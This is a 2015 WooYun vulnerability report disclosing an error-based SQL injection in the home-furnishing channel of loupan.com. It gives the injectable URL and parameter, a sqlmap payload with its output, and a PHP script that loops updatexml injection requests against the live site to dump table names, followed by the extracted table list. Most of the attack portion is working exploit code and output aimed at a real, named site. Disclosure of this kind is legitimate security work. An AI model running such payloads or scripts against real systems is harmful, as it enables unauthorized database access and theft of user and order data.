当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106520

漏洞标题:楼盘网家居建材频道sql注入(附验证脚本)

相关厂商:loupan.com

漏洞作者: Pany自留地

提交时间:2015-04-08 09:36

修复时间:2015-05-23 10:28

公开时间:2015-05-23 10:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-08: 细节已通知厂商并且等待厂商处理中
2015-04-08: 厂商已经确认,细节仅向厂商公开
2015-04-18: 细节向核心白帽子及相关领域专家公开
2015-04-28: 细节向普通白帽子公开
2015-05-08: 细节向实习白帽子公开
2015-05-23: 细节向公众公开

简要描述:

error-based注入 可以获取敏感数据

详细说明:

注入点:

http://jiaju.loupan.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2


---
Parameter: name (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: action=modelquote&cid=1&name=spacecomments where 1=2 AND (SELECT 99
65 FROM(SELECT COUNT(*),CONCAT(0x7162787071,(SELECT (CASE WHEN (9965=9965) THEN
1 ELSE 0 END)),0x7162627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER
_SETS GROUP BY x)a)-- xClc
---
[09:08:20] [INFO] retrieved: 5.1.63-log
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
banner:    '5.1.63-log'
[09:08:20] [INFO] retrieved: jiaju_loupan@localhost
current user:    'jiaju_loupan@localhost'
[09:08:20] [INFO] retrieved: jiaju_loupan
current database:    'jiaju_loupan'
current user is DBA:    False


验证脚本:
获取表:

<?php
for($num=0;$num<=100;$num++){
$sql_url = "http://jiaju.loupan.com/batch.common.php/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=1%20and%201=(updatexml(0,concat(0x7e,(SELECT%20concat(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema=database()%20limit%20${num},1)),0))--%20-";
$result1 = file_get_contents($sql_url);
$match = preg_match('/~(.*)\'/i',$result1,$result);
echo $result[1]."\r\n";
ob_flush();
flush();
}
?>


漏洞证明:

表名:

ecm_acategory
ecm_address
ecm_article
ecm_attribute
ecm_brand
ecm_cart
ecm_category_goods
ecm_category_store
ecm_collect
ecm_coupon
ecm_coupon_sn
ecm_friend
ecm_function
ecm_gcategory
ecm_goods
ecm_goods_attr
ecm_goods_image
ecm_goods_qa
ecm_goods_spec
ecm_goods_statistics
ecm_groupbuy
ecm_groupbuy_log
ecm_mail_queue
ecm_member
ecm_message
ecm_module
ecm_navigation
ecm_order
ecm_order_extm
ecm_order_goods
ecm_order_log
ecm_pageview
ecm_partner
ecm_payment
ecm_privilege
ecm_recommend
ecm_recommended_goods
ecm_region
ecm_scategory
ecm_sessions
ecm_sessions_data
ecm_sgrade
ecm_shipping
ecm_store
ecm_uploaded_file
ecm_user_coupon
ecm_user_priv
[Table]adminsession
[Table]ads
[Table]announcements
[Table]attachments
[Table]attachmenttypes
[Table]blocks
[Table]cache
[Table]cache_0
[Table]cache_1
[Table]cache_2
[Table]cache_3
[Table]cache_4
[Table]cache_5
[Table]cache_6
[Table]cache_7
[Table]cache_8
[Table]cache_9
[Table]cache_a
[Table]cache_b
[Table]cache_c
[Table]cache_d
[Table]cache_e
[Table]cache_f
[Table]categories
[Table]channels
[Table]cities
[Table]click
[Table]clickgroup
[Table]clickuser
[Table]creditlog
[Table]creditrule
[Table]crons
[Table]customfields
[Table]forums
[Table]friendlinks
[Table]members
[Table]modelcolumns
[Table]modelfolders
[Table]modelinterval
[Table]models
[Table]pages
[Table]polls
[Table]postitems
[Table]postlog
[Table]postmessages
[Table]postset
[Table]prefields
[Table]reports
[Table]robotitems
[Table]robotlog
[Table]robotmessages
[Table]robots
[Table]rss
[Table]settings


修复方案:

版权声明:转载请注明来源 Pany自留地@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-04-08 10:27

厂商回复:

感谢您对本网站的关注。

最新状态:

暂无